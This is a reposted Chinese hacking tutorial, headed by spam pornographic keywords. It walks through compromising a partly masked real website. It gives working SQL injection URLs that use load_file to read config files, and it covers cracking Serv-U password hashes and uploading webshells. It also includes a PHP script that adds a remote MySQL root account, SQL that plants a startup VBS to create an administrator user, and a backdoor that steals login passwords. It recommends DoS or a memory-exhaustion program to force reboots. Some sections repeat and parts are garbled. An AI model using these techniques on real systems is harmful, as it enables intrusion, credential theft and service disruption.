小男孩‘自慰网亚洲一区二区,亚洲一级在线播放毛片,亚洲中文字幕av每天更新,黄aⅴ永久免费无码,91成人午夜在线精品,色网站免费在线观看,亚洲欧洲wwwww在线观看

分享

PHP注入某大型網(wǎng)站...

 accesine 2005-09-14

PHP注入某大型網(wǎng)站

前言:從2003年開始,國內(nèi)越來越多的朋友都喜歡了腳本攻擊,各種ASP注入方法、技巧,真可謂是曾出不窮!同時也應(yīng)運而生了很多好的注入工具,最典型的屬小竹的NBSI和臭要飯的ESC,對MSSQL數(shù)據(jù)庫在配上臭要飯的GETWEBSHELL更是如虎添翼如魚得水!隨著ASP注入的日益成熟,PHP+MYSQL注入也漸漸升溫起來,很多朋友也轉(zhuǎn)移到了這上面來!同時也出現(xiàn)了比較好的工具如CASI和二娃。接下來結(jié)合一個具體的實例,邊理論邊實踐詳細(xì)講述如何由一個小小的PHP注入漏洞,引發(fā)破譯SERV-U密碼,上傳PHPSHELL,控制MYSQL數(shù)據(jù)庫,及如何提升系統(tǒng)權(quán)限的全過程!本文僅供大家參考,共同提高技術(shù),同時也希望管理員及時彌補系統(tǒng)漏洞,所涉及網(wǎng)址、圖片、漏洞,如有雷同,純屬巧合。引用黑防的一句很經(jīng)典的話"在攻與防的對立中尋求統(tǒng)一!"

一、 PHP注入漏洞,驚顯文件內(nèi)容
  
手工注入法

⑴尋找PHP注入漏洞

平時喜歡在一些知名網(wǎng)站上看文章,下載它們的最新動畫!有時看到帶參數(shù)的,手一癢(^_^)就想在它們后面加上"‘","and 1=1" ,"and 1=2"測試測試。不會吧!http://www.******.net/down/show.php?id=100這個頁面竟然存在PHP注入漏洞!在后面加上"‘"http://www.******.net/down/show.php?id=100‘程序輸出錯誤結(jié)果:          
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in D:\******\down\show.php on line
45 
Warning
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\******\down\global.php on line
578
哇,系統(tǒng)的物理路徑和數(shù)據(jù)庫類型爆露出來了!這為以后上傳執(zhí)行PHPSHELL,下載服務(wù)器上的軟件提供了路徑條件!
提交:http://www.*****.net/down/show.php?id=100 and 1=1出現(xiàn)正常頁面, 提交:http://www.*****.net/down/show.php?id=100 and 1=2頁面內(nèi)相應(yīng)軟件介紹的地方顯示"不詳",說明存在PHP注入漏洞。如下圖所示:

相關(guān)知識點:在php.ini文件中,magic_quotes_gpc boolean 設(shè)定 GET/POST/COOKIE 三種模組的特殊字元,包含單引號、雙引號、反斜線、及空字 (NUL) 是否要自動加入反斜線當(dāng)溢出字元;display_errors boolean 本選項設(shè)定是否要將執(zhí)行的錯誤信息顯示在使用者的瀏覽器上。有點經(jīng)驗的朋友一看就知道,原來它用的是夜貓下載系統(tǒng)!趕快下載一個源程序look一下它的源代碼,發(fā)現(xiàn)沒有對id沒過濾好!

⑵開始注入,首先確定表中字段數(shù)目

不像平時ASP注入一樣,我們接下來提交:http://www.*****.net/down/show.php?id=100 and 1=2  union select 1出現(xiàn):Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in D:\******\down\show.php on line 45 
Warning
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in

D:\******\down\global.php on line 578
繼續(xù)提交http://www.*****.net/down/show.php?id=100 and 1=2 union select 2,1同樣出現(xiàn)上面的錯誤!當(dāng)我們提交到:http://www.*****.net/down/show.php?id=100 and 1=2 union select 19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1時出現(xiàn)了沒有錯誤提示界面,頁面中出現(xiàn)的上面語句select后面數(shù)字的地方,就是表示庫中表字段出現(xiàn)的位置如18,文件大小地方出現(xiàn)的16,應(yīng)用平臺地方出現(xiàn)的14等。19表明這個表是共有19個字段。

㈢驚現(xiàn)文件內(nèi)容

下面將引入幾個重要函數(shù):在SQL語句中,可以使用各種MySQL內(nèi)置的函數(shù),經(jīng)常使用的就是DATABASE()USER()、SYSTEM_USER()SESSION_USER()、CURRENT_USER()、VERSION()這些函數(shù)來獲取一些系統(tǒng)的信息,還有一個應(yīng)用得比較多的超重量級的函數(shù),就是load_file(),該函數(shù)的作用是讀入文件,并將文件內(nèi)容作為一個字符串返回。我們要讀取計算機中的文件就全靠它了,然而也是有條件限制的:
1、知道文件正確的路徑;2、有權(quán)限讀取并且文件必須完全可讀 ;3、欲讀取文件必須小于 max_allowed_packet。 如果該文件不存在,或因為上面的任一原因而不能被讀出,函數(shù)返回空。
接下來我們提交如下語句:http://www.*****.net/down/show.php?id=100 and 1=2 union select 19,DATABASE(),17,CURRENT_USER(),SYSTEM_USER(),VERSION(),13,12,11,10,9,8,7,6,5,4,3,2,1 看到系統(tǒng)信息如下圖:

接下來我們再提交如下語句:http://www.*****.net/down/show.php?id=100 and 1=2 union select 19,DATABASE(),17,CURRENT_USER(),SYSTEM_USER(),VERSION(),13,12,11,10,9,load_file(‘d:\******\down\include\config.inc.php‘),7,6,5,4,3,2,1同樣出現(xiàn)前面提交時的錯誤提示。很明顯,錯誤出在load_file(‘d:\******\down\include\config.inc.php‘)當(dāng)中。
相關(guān)知識點:程序沒把d:\******\downinclude\config.inc.php內(nèi)容老老實實顯示出來,因為在php.inimagic_quotes_gpc = on,如何才能構(gòu)造出沒有引號的語句呢?經(jīng)??春诜赖呐笥褢?yīng)該很輕松的能構(gòu)造出,04年黑防第七期安全天使.angle的《SQL Injection with MySQL》一文介紹的用char()函數(shù)或者把字符轉(zhuǎn)換成16進(jìn)制。‘d:\******\down\include\config.inc.php‘,就是char(100,58,92,42,42,42,42,42,42,92,100,111,119,110,92,105,110,99,108,117,100,101,92,99,111,110,102,105,103,46,105,110,99,46,112,104,112)或者是"0x643A5C2A2A2A2A2A2A5C646F776E5C696E636C7564655C636F6E6669672E696E632E

706870"
接下來我們在提交如下語句:http://www.*****.net/down/show.php?id=100 and 1=2 union select 19,DATABASE(),17,CURRENT_USER(),SYSTEM_USER(),VERSION(),13,12,11,10,9,load_file(char(100,58,92,42,42,42,42,42,42,92,100,111,119,110,92,105,110,99,108,117,100,101,92,99,111,110,102,105,103,46,105,110,99,46,112,104,112)),7,6,5,4,3,2,1看到的配置文件config.inc.php內(nèi)容如下圖:

成功:http://www.*****.net/down/show.php?id=100 and 1=2 union select 19,DATABASE(),17,CURRENT_USER(),SYSTEM_USER(),VERSION(),13,12,11,10,9,load_file(char(100,58,92,42,42,42,42,42,42,92,100,111,119,110,92,105,110,99,108,117,100,101,92,99,111,110,102,105,103,46,105,110,99,46,112,104,112)),7,6,5,4,3,2,1 from ymdown_user into  outfile ‘ d:\******\down\include\configicnphp.txt ‘(就是把目錄成char()或十六進(jìn)制也不成,請高手指點^_^)以上介紹的是手工的方法看文件內(nèi)容。

㈡   工具注入法

①注入工具二娃的使用方法

在"URL"地方添入存在有注入的網(wǎng)址可不要忘記了參數(shù)。"注入前頁面的關(guān)鍵字":因為加入and 1=1and 1=2面頁顯示的內(nèi)容不同,"注入前頁面的關(guān)鍵字"即為加入and1=1 時頁面上存在,而加入and 1=2進(jìn)頁面不存在的字,在這里取了個時間為關(guān)鍵字。點"檢測"按鈕很快就會在結(jié)果中出現(xiàn)表中的字段數(shù)。比起手工來是又快又輕松?。↑c"導(dǎo)入列表"會讀取文本文件(biao.txt,你可以在此文件中自行添加表名)中的表名到右邊文本框中。點"猜表"按鈕,開始猜測表名。"生成backup"用來備份表?。ㄔ诒敬巫⑷胫袀浞輿]有成功,希望高手指點!

②注入工具CASI的使用方法

CASI一個相當(dāng)不錯的PHP注入工具,利用它可以輕松得到文件內(nèi)容!而且還帶有MYSQL連接器等四個工具!經(jīng)過我測試,它最多猜測字段數(shù)是51個。下面來詳細(xì)介紹一下如何利用它來顯示文件內(nèi)容:
在"注入URL"中添入存在注入漏洞的URL包括參數(shù);"判斷字符"一般默認(rèn)mysql_fetch_arraymysql_fetch_array傳回陣列資料。 語法: array mysql_fetch_array(int result, int [result_typ]);

傳回值: 陣列 函式種類: 資料庫功能 本函式用來將查詢結(jié)果 result 拆到陣列變數(shù)中。若 result 沒有資料,則傳回 false 值。而本函式可以說是 sql_fetch_row.htm">mysql_fetch_row() 的加強函式,除可以將傳回列及數(shù)字索引放入陣列之外,還可以將文字索引放入陣列中。若是好幾個傳回欄位都是相同的文字名稱,則最后一個置入的欄位有效,解決方法是使用數(shù)字索引或者為這些同名的欄位 (column) 取別名 (alias)。值得注意的是使用本函式的處理速度其實不會比 sql_fetch_row.htm">mysql_fetch_row() 函式慢,要用哪個函式還是看使用的需求決定。參數(shù) result_typ 是一個常數(shù)值,有以下幾種常數(shù) MYSQL_ASSOC、MYSQL_NUM 與 MYSQL_BOTH。)然后點右邊的"字段掃描"按鈕,在最下面的文本框中,就會出現(xiàn)掃描結(jié)果,如果存在漏洞,select 后面的數(shù)字會出現(xiàn)在網(wǎng)頁的相應(yīng)位置。在暴代碼欄中,loadfile插入位置",8"表示:文件內(nèi)容就會出現(xiàn)在網(wǎng)頁中8出現(xiàn)的位置,目標(biāo)文件path中輸入寫入你要查看的文件絕對路徑如圖所示,點"確定"按鈕后就會在下面的文本框中8以前出現(xiàn)的位置出現(xiàn)文件代碼如圖所示。在暴密碼欄中,用戶名插入位置",16"表示:把用戶名顯示在網(wǎng)頁中16出現(xiàn)的位置;用戶名字段表示在表中代表用戶名的字段的名稱,本表為username; 用密碼插入位置",14"表示:把用戶密碼顯示在網(wǎng)頁中14出現(xiàn)的位置;用密碼字段名表示在表中代表用戶密碼的字段的名稱,本表為password;表名表示:所猜解表的名稱,本表為ymdown_user;點右邊的確定按鈕后,用戶名和密碼就分別出現(xiàn)在16和14出現(xiàn)的位置了。"停止","刷新","前進(jìn)","后退","瀏覽",與IE瀏覽器相似,在這里就不贅述了。在工具箱欄中,還帶有"后臺掃描"、"whois查詢"、"mysql連接器"、"http頭信息"四個工具,點擊后臺"掃描按鈕"會在程序信息中出現(xiàn)發(fā)現(xiàn)的url,然后在利用前面講述的方法,看它的內(nèi)容你會得到很多重要信息噢;點擊"whois查詢",會出現(xiàn)一個可按四種方式查詢的面頁http://whois./,特別是按IP查詢,輸入一個IP你可以查出在同一IP上所掛的所有域名,這也是旁注入侵的關(guān)鍵所在;點擊"mysql連接器"按鈕,出現(xiàn)一個mysql連接器登錄界面,利用下文講述的方法得到用戶名和密碼后,就可登錄進(jìn)去一展身手吧!值得注意的兩點是如果連接成功進(jìn)入后如下圖,有個"關(guān)閉mysql"按鈕,一定要小心,點了后,mysql 可就關(guān)了,這時你在瀏覽網(wǎng)頁時就會報錯,MYSQL數(shù)據(jù)庫連接失?。?!在執(zhí)行sql語句操作時,命令結(jié)果不回顯,所以說語法一定要正確,否則錯了也不知原因!點擊"http頭信息"按鈕,將在程序信息中顯示http頭信息情況!

一、 MYSQL庫無外連,深挖SERV-U密碼
CASI
妙看表中內(nèi)容

原理明白后,我們還是利用CASI工具,畢竟這樣來的更快!通過CASI我們可以得到下載系統(tǒng)的后臺密碼!(也可通過語句:http://www.*****.net/down/show.php?id=100 and 1=2 union select 19,18,17, username,15,password,13,12,11,10,9,8,7,6,5,4,3,2,1 from       ymdown_user)如圖所示:

進(jìn)入它的下載管理面頁看看:http://www.******.net/down/admin/index.php暈空的,原理管理員早把它刪了,看來此路不通?。ㄆD難的路程剛剛開始,后面很多地方,管理員都做了相應(yīng)的設(shè)置,看我是如何來突破層層防線!)
在http://www.*****.net/down/show.php頁面的左上角有個上"管理"鏈接??!點開一看原來是個空鏈接;再點"上傳",需要登錄,這是夜貓文章系統(tǒng)的面頁,哪我們就在來看看它的文章系統(tǒng)。利用CASI先查看配置文件的內(nèi)容:http://www.*****.net/article/include/config.inc.php內(nèi)容與下載系統(tǒng)的差不多。內(nèi)容如下圖所示:

碰碰運氣,進(jìn)入下載系統(tǒng)的用戶和密碼登錄管理頁面,登錄失??!在兩個系統(tǒng)的配置文件中,我們可以知道它們的數(shù)據(jù)庫名分別為download和article因為文章系統(tǒng)沒找注入漏洞,沒辦法讀出它的用戶名和密碼,哪能不能通過下載系統(tǒng)的實現(xiàn)跨庫查詢呢?(我沒有成功!如哪位高手實現(xiàn)請轉(zhuǎn)告)難道就沒有辦法了嗎?MYSQL的密碼會留在C:\windows\my.ini(注

:win2000c:\winnt\my.ini,win2003c:\windows\my.ini)文件中,查看其內(nèi)容,暈沒找到文件,看來是管理員把文件刪了或移到別的目錄下了!MYSQL中的數(shù)據(jù)庫和庫中的表是如何存放在計算機中的呢?答案:/mysql/data/數(shù)據(jù)庫名/表名.后綴名(后綴名有MYD,FRM,MYI      其中MYD中存放了表中的所有內(nèi)容)。利用管理員在裝軟件時默認(rèn)路徑的習(xí)慣,我們可以很容易的猜出我們想要的文件的物理路徑。利用CASIC:\mysql\data\mysql\user.myd的文件內(nèi)容如下:
7­利 localhost



 








root66121efb4645a6

 


root66121efb4645a6

 


root66121efb4645a6

; ? localhostdownload7d27f0db44**ea1d[1][1][1][1][1][1][1][1][1]Hd5d33a536[1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1] 4a[1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1]
管理員根本沒有開遠(yuǎn)程用戶(localhost表示本地連接,%表示可以遠(yuǎn)程連接),利用牛族MYSQL連接器沒辦法遠(yuǎn)程登錄了!看來又是那句話:"此路不通" ??纯碿:\mysql\data\download\username.myd的內(nèi)容,我們前面得到的下載系統(tǒng)的用戶名和密碼在里面了^_^;在看看c:\mysql\data\article\user.myd文件內(nèi)容,頁面顯示無,暈,是此表不存在還是內(nèi)容為空?(這又是管理員做了設(shè)置吧!)看來想進(jìn)入文章系統(tǒng)的后臺,又是那句話"此路不通"!還是從常記憶吧!

; ? localhostdownload7d27f0db44**ea1d[1][1][1][1][1][1][1][1][1]Hd5d33a536[1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1] 4a[1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1]
管理員根本沒有開遠(yuǎn)程用戶(localhost表示本地連接,%表示可以遠(yuǎn)程連接),利用牛族MYSQL連接器沒辦法遠(yuǎn)程登錄了!看來又是那句話:"此路不通" 。看看c:\mysql\data\download\username.myd的內(nèi)容,我們前面得到的下載系統(tǒng)的用戶名和密碼在里面了^_^;在看看c:\mysql\data\article\user.myd文件內(nèi)容,頁面顯示無,暈,是此表不存在還是內(nèi)容為空?(這又是管理員做了設(shè)置吧?。┛磥硐脒M(jìn)入文章系統(tǒng)的后臺,又是那句話"此路不通"!還是從長計議吧!

HSACN掃出新思路

拿出Hscan.exe這個短小精悍的掃描工具,掃描結(jié)果如下:


開了21端口,登錄一試還是SERV-U5.0來。再次利用CASI查看:C:\Program Files\Serv-U\ServUDaemon.ini(這個也是SERV-U的默認(rèn)安裝路徑)的內(nèi)容!這可是個核心文件?。±锩嬗涗浟撕芏嘀匾獌?nèi)容:如用戶名,用戶數(shù),密碼,用戶所在的目錄以及對此目錄的操作權(quán)限等。主要內(nèi)容如下:
    [GLOBAL]

Version=5.0.0.4

.........

[DOMAINS]

Domain1=211.92.***.*||21|***.net|1|0|0

[Domain1]

User1=b******n|1|0

......

[USER=b******n|1]

Password=gk5****EF75***2A8182464CD7EE8B***C

HomeDir=d:\s***n\ a***lover\photo\gallery

RelPaths=1

TimeOut=600

Access1=D:\s***n\ a***lover\photo\gallery |RWAMLCDP

SKEYValues=

......

深挖SERV-U密碼

方法一:爆破法.最顯眼的要屬用戶名和密碼了,關(guān)鍵是如何破密碼呢?到網(wǎng)上搜了一個專門破SERV-U密碼的工具(Serv-UPassCrack1.0a.rar),太慢了,這要等到何年何月?。「纱嘤糜浭卤敬蜷_它的腳本crack.vbs.看看解密原理:假設(shè)原來明文密碼用"password_mingwen"表示,密文密碼也就是我們在ServUDaemon.ini中看到的密碼(34位),用"password_miwen"表示,密文的前兩位合并上明文,然后經(jīng)MD5加密后正好等于密文的后三十二位!即:
md5password_mingwen+left(password_miwen,2)=right(password_miwen,32)俗話說的好啊,"工欲善其事,必先利其器"在網(wǎng)上找了兩上絕配的工具!一個是MD5CrackSpV2.3(速度增強版,一個非常好用的MD5爆破工具),另一個是字典專家.BBSt,利用它我們可以生成前兩位為我們指定字母的字典??!MD5CrackSpV2.3速度奇快,我們可以指定開的線程數(shù),我在P4,256M內(nèi)存環(huán)境下做了一個測試,利用字典專家.BBSt生成一個含3億條記錄,1.2G左右的字典, MD5CrackSpV2.38線程跑,總共用了30分鐘!一個線程一秒鐘跑大約2萬條記錄,8個線程一秒鐘,就是16萬條記錄!!照此計算一臺機器一天就能跑約138億條記錄!假如有十臺P4連合作業(yè),威力無窮啊!同時在網(wǎng)上看到消息說山東大學(xué)已經(jīng)研究出來了破解MD5的算法!但是沒有找到具體的程序,程序一旦出世,密而不密,恐怕很多網(wǎng)站又要遭殃了!!

方法二:程序法.不要在一棵樹上吊死,一邊掛著字典爆破,一邊看看還有沒有別的途徑,雙管齊下嗎,要不閑著也是閑著(哈哈)!在c:\Program Files\Serv-U\ServUDaemon.ini文件中共有十多位用戶,其中有一個的用戶目錄:"d:\s***n\a***lover\photo\gallery" 吸引了我。立即在瀏覽器中打上http://www.*****.net/ a***lover/photo/gallery 出現(xiàn)如下提示:"This Virtual Directory does not allow contents to be listed",在試試它的上一級目錄看看:http://www.*****.net/ a***lover/photo/真是山重水復(fù)疑無路,柳暗花明又一村??!原來在機子里還藏著個某某網(wǎng)絡(luò)相冊.首先注冊個用戶進(jìn)去看看,有圖片上傳功能啊,抓包看看是否存在有類似動網(wǎng)UPFILE的漏洞,用NC提交后失敗了,上傳類型還是圖片文件,又是那句話:"此路不通"。利用CASI查看http://www.*****.net/ a***lover/photo/index.php的文件內(nèi)容得知:程序中文名稱:文本圖片管理程序 程序英文名稱:NEATPIC  版本:2.0.13 BETA,老規(guī)矩先到網(wǎng)上下個研究研究在說。經(jīng)過分析目錄結(jié)構(gòu)發(fā)現(xiàn)在:database/user.php文件用于存放用戶名密碼等注冊信息!用CASI打開:http://www.*****.net/ a***lover/photo/database/user.php顯示無文件內(nèi)容!難道是默認(rèn)目錄不對?!管理員把目錄改了??!看配置文件:http://www.*****.net/ a***lover/photo/inc/config.inc.php發(fā)現(xiàn):
// 參數(shù)設(shè)置

//*********************************
$DataDir = "database678"; //
雜項數(shù)據(jù)存放目錄

$CatDir = "second"; //
二級分類數(shù)據(jù)存放目錄

$SortDir = "main"; //
分類數(shù)據(jù)文件存放目錄

$PicRecordDir = "picdata"; //
圖片數(shù)據(jù)總目錄

$PicDir = "pic"; //
圖片文件存放目錄

$SPicDir = "spic"; //
縮略圖存放目錄

$CommentDir = "comment"; //
圖片評論目錄

$UserDat = "user.php"; //
用戶數(shù)據(jù)文件

$Dat = "dat.php"; //
相冊數(shù)據(jù)文件

果然管理員把默認(rèn)的database目錄改成了database678了!現(xiàn)在可以用CASI查看user.php的內(nèi)容了如下圖:

最下面的哪一行即ID=1的為管理員的注冊信息,第一個為用戶名,第二個為密碼。發(fā)現(xiàn)該用戶名與ServUDaemon.ini中的相同,密碼會不會也相同呢?(很多人都有使用同一密碼的習(xí)慣?。。┐蜷_DOS窗口-->登錄FTP-->輸入用戶名和密碼,成功了,終于成功了!揪出這個密碼可真不容易?。。∵@時字典還在哪掛著來,要跑出這個8位純字母的密碼也要費一段時間?。?!

一、 上傳PHPSHELL,控制MYSQL數(shù)據(jù)庫

通過ServUDaemon.ini文件中的Access1=D:\s***n\ a***lover\photo\gallery |RWAMLCDP知道該用戶具有:讀取(R),寫入(W),追加(A)等功能,唯獨缺少了"執(zhí)行(E)"功能!利用PUT命令上傳一個一句話的WebShell上去.在瀏覽器中運行http://www.*****.net/ a***lover/photo/gallery/webshell.php?cmd=dir,出現(xiàn):
Warning: passthru(): Unable to fork [dir] in D:\s***n\a***lover\photo\gallery\webshell.php on line 1
看來外部命令不能執(zhí)行,管理員一定作了相應(yīng)設(shè)置.再上傳一個phpinfo.php文件 在瀏覽器中運行:http://www.*****.net/ a***lover/photo/gallery/phpinfo.php,這時在php.ini變量的設(shè)置都顯示出來了(當(dāng)然也你可以利用CASIc:\windows\php.ini 的內(nèi)容)!外部命令不能執(zhí)行的原因在此:

safe_mode

Off
Off
safe_mode_exec_dir
no value
no value
safe_mode_gid
Off
Off
safe_mode_include_dir
no value
no value

接下來上傳一個自己編的僅帶有瀏覽,拷貝,重命名,刪除文件和上傳文件五個功能的PHPSHELLCMD.PHP

:由于時間倉促代碼界面沒優(yōu)化好,在dir文本框中輸入要瀏覽的目錄名稱;copy文本框中,上面輸入源文件如d:\web\cmd.php,下面輸入目標(biāo)文件如d:\web\cmdbak.php;del文本框中輸入要刪除的文件名如:d:\web\cmdbak.php;ren命令與copy命令相似;點瀏覽按鈕,選擇你要上傳的文件,然后點upload按鈕,就上傳到與本SHELL相同的目錄下了.

運行: http://www.*****.net/ a***lover/photo/gallery/cmd.php,利用dir命令,可以看D,C:\windows,以及C:\Program Files下的內(nèi)容,而且對D盤還有寫權(quán)限!在通過copy命令把想下載的軟件考到WEB目錄下下載下來了^_^

如何才能把文件寫到只讀的C盤上呢這就要通過MYSQL!但是MYSQL沒有遠(yuǎn)程連接啊!沒有條件創(chuàng)造條件,看文章系統(tǒng)的配置文件config.inc.php的內(nèi)容了嗎?
    $dbhost="localhost";//數(shù)據(jù)庫主機名

$dbuser="root";//數(shù)據(jù)庫用戶名

$dbpass="******";//數(shù)據(jù)庫密碼

$dbname="article";//數(shù)據(jù)庫名

數(shù)據(jù)庫用戶名和密碼都知道了,可惜的是本地用戶,然而我們能不能通過本地有最高權(quán)限用戶root來添加個遠(yuǎn)程用戶呢?答案是肯定的。

為此專門寫了個程序adduser.php利用已知的有ROOT權(quán)限的賬號添寫加遠(yuǎn)程ROOT權(quán)限的賬號,內(nèi)容如下:

$dbh=mysql_connect(‘localhost:3306‘,‘root‘,‘*****‘);//

echo mysql_errno().": ".mysql_error()."
";

mysql_select_db(‘mysql‘);

echo mysql_errno().": ".mysql_error()."
";

$query="GRANT ALL PRIVILEGES ON *.* TO username@‘%‘IDENTIFIED BY ‘password‘ WITH GRANT OPTION";

$res=mysql_query($query, $dbh);

echo mysql_errno().": ".mysql_error()."
";

$err=mysql_error();

if($err){

  echo "ERROR!";

}

else{

  echo "ADD USER OK!";

  }

?>

利用cmd.php上傳adduser.php執(zhí)行后,就在庫中添加了一個遠(yuǎn)程ROOT賬號,就可以用CASI帶的MYSQL連接器連上了?。∷梢园袽YSQL庫關(guān)了??!用牛族可方便的瀏覽表中的記錄?。∪缦聢D:帶%號的用戶為添加的遠(yuǎn)程用戶。

四、 提升權(quán)限

FTP是ServU5.0.0.4又有用戶名和密碼,自然會想到是否存在溢出,在網(wǎng)上搜個工具sftp

執(zhí)行Sftp -I 211.92.***.*** -u b*****b -p ****** -t 1 -o 1 -p 21后沒有溢出成功,看來是管理員打了補丁!哪只好想別的辦法了!(-I 表示ip地址,-u 用戶名,-p 密碼-o操作系統(tǒng)類型,-p 端口號) 以下總結(jié)了幾種提升權(quán)限的方法供大參考:

方法一、打開牛族MYSQL連接器,在命令行上輸入:

user download;

create table cmdphp (cmd TEXT);

insert into cmdphp values("set wshshell=createobject(\"wscript.shell\")");

insert into cmdphp values("a=wshshell.run(\"cmd.exe /c net user hello hello\",0)");

insert  into  cmdphp  values("b=wshshell.run(\"cmd.exe /c net user localgroup administrators hello /add\",0)");

select * from cmdphp into outfile "c:\\Documents and Settings\\Administrator\\[開始]菜單\\程序\\啟動\\cmdphp.vbs";

注意:在路徑中要用"\\"而不是"\",要加雙引號時,前面必需加"\"。原理是:我們在download數(shù)據(jù)庫中,建了一個表cmdphp,表中共一個字段cmd,我們把要執(zhí)行的命令寫到表中,然后在在表中導(dǎo)出到啟動菜單中!這樣只要一重起后,我們就會得到一個管理員級的用戶hello了。d:\s***n\a***lover\photo\gallery

方法二、修改SERV-U的文件ServUDaemon.ini中的相應(yīng)內(nèi)容:
Password=hq50AAF4CB3FA4EF89C9E9D605B20B2971

HomeDir=c:\

RelPaths=1

TimeOut=600

Access1=D:\s***n\ a***lover\photo\gallery |RWAMELCDP

Maintenance=System

SKEYValues=

把密碼換成我們知道的密碼,把主目錄換成c:\,Access1后的目錄可以不用換,這樣使管理員在SERV-U里看起來還是以前的目錄名,|RWAMELCDP這一串是關(guān)鍵,我們比以前多加了一個"E"代表我們有"執(zhí)行"權(quán)限,Maintenance=System表示我們的身份是管理員。

在本地設(shè)置好后,就開始想辦法,替換掉它的文件?首先,利用我的哪個cmd.。php SHELL的上傳文件功能,先把它上傳到d:\s***n\a***lover\photo\gallery目錄(上傳成功后文件與SHELL在同一目錄)下,同樣再打開牛族MYSQL連接器:
    user download;

create table servu (cmd TEXT);

load data infile "d:\\s***n\\a***lover\\photo\\gallery\\ServUDaemon.ini;

select * from servu into outfile "C:\Program Files\Serv-U\ServUDaemon.ini";

條件是SERV-U重啟后,我們的哪個用戶就是管理員了,而且在C盤根目錄下具有可執(zhí)行權(quán)限。登上SERV-U服務(wù)器上執(zhí)行如下命令:

quote site exec net.exe user hello hello /add

quote site exec net.exe localgroup administrators hello /add

這樣我們就得到了一個管理員級的用戶hello。如果沒有開3389我們可以利用PUT上傳給它上傳個3389.EXE,然后用quote執(zhí)行后,就可以用3389登錄器連接了!同樣我們也可以利用另外一個小工具xyzcmd.exe在DOS下登錄,會得到一個CMDSHELL.

方法三:由于管理員在PHP.INI中做了一些限制,上傳的PHPSHELL沒法執(zhí)行外部命令,利用CMD.PHP的瀏覽命令,你可以在它的上面找到它的PHP和SERV-U的安裝程序,DOWN下來,在本機上模擬它的環(huán)境,配置自己的PHP.INI文件,使它能夠執(zhí)行外部命令,解釋ASP和CGI,然后利用方法二替換掉它的PHP.INI文件。也有個條件就是WEB重啟后才能生效。我們需要一個小東西-FPIPE.EXE端口重定向工具!fpipe -v -l 5210 -s 5209 -r 43958  127.0.0.1(把本機的43958端口,通過5209端口,轉(zhuǎn)發(fā)到5210端口)打開你本地SERV-U添加一臺服務(wù)器,來連接5210,填上服務(wù)器IP,監(jiān)聽端口號5210,填上帳戶和密碼!                  user:LocalAdministrator    pass:#l@$ak#.lk;0@P全部搞定后,來連接SERV-U,連接成功后,我們就對此服務(wù)器SERV-U有了完全控制權(quán)限!然后登錄上SERV-U加管理員用戶就OK了!

方法四:社會工程學(xué)加網(wǎng)頁木馬!在04年黑防第6期我的朋友血漢的《網(wǎng)頁木馬讓你肉雞成群》一文中,講了許多做木馬的方法,在這里就不啰嗦了,省的老獨說轉(zhuǎn)稿費,哈哈!把"馬"傳上去后,可以在論壇里發(fā)個貼子,如"管理員我發(fā)現(xiàn)了此網(wǎng)站一個漏洞!"或"管理員我對網(wǎng)站有幾點建議"估計不久真的會成為"養(yǎng)雞專業(yè)戶了"。建議不要改人家的主頁,一來不好,二來如果掛在主頁上,管理員看到后不一定會點開!還有更隱蔽的一招,就是修改源程序(估計一般管理員不會沒事讀源程序吧^_^),找到網(wǎng)站登錄的程序,加一段程序,可以根據(jù)ID來判斷是管理員,如果是把他的密碼(在如MD5加密前)插入到你的信箱或QQ等字段中,這樣你可以打開你的用戶資料來看了??!

接下來談?wù)勅绾谓蟹?wù)器重起:方法一、我非常建議用的方法哪就是DOS攻擊!方法二、如果你上傳的SHELL能執(zhí)行命令!可以傳一個很簡單的C程序,讓它不斷地MALLOC分配內(nèi)存,而且不FREE。

#include

#include

main()

{for(; ;) malloc(0xffffff);}

方法三、如果一些網(wǎng)站是PHP的不能執(zhí)行外部命令(我們上傳上去的可執(zhí)行文件不能運行)!哪位高手編一個PHP程序耗掉它的資源!

HSACN掃出新思路

拿出Hscan.exe這個短小精悍的掃描工具,掃描結(jié)果如下:


開了21端口,登錄一試還是SERV-U5.0來。再次利用CASI查看:C:\Program Files\Serv-U\ServUDaemon.ini(這個也是SERV-U的默認(rèn)安裝路徑)的內(nèi)容!這可是個核心文件??!里面記錄了很多重要內(nèi)容:如用戶名,用戶數(shù),密碼,用戶所在的目錄以及對此目錄的操作權(quán)限等。主要內(nèi)容如下:
    [GLOBAL]

Version=5.0.0.4

.........

[DOMAINS]

Domain1=211.92.***.*||21|***.net|1|0|0

[Domain1]

User1=b******n|1|0

......

[USER=b******n|1]

Password=gk5****EF75***2A8182464CD7EE8B***C

HomeDir=d:\s***n\ a***lover\photo\gallery

RelPaths=1

TimeOut=600

Access1=D:\s***n\ a***lover\photo\gallery |RWAMLCDP

SKEYValues=

......

深挖SERV-U密碼

方法一:爆破法.最顯眼的要屬用戶名和密碼了,關(guān)鍵是如何破密碼呢?到網(wǎng)上搜了一個專門破SERV-U密碼的工具(Serv-UPassCrack1.0a.rar),太慢了,這要等到何年何月??!干脆用記事本打開它的腳本crack.vbs.看看解密原理:假設(shè)原來明文密碼用"password_mingwen"表示,密文密碼也就是我們在ServUDaemon.ini中看到的密碼(34位),用"password_miwen"表示,密文的前兩位合并上明文,然后經(jīng)MD5加密后正好等于密文的后三十二位!即:
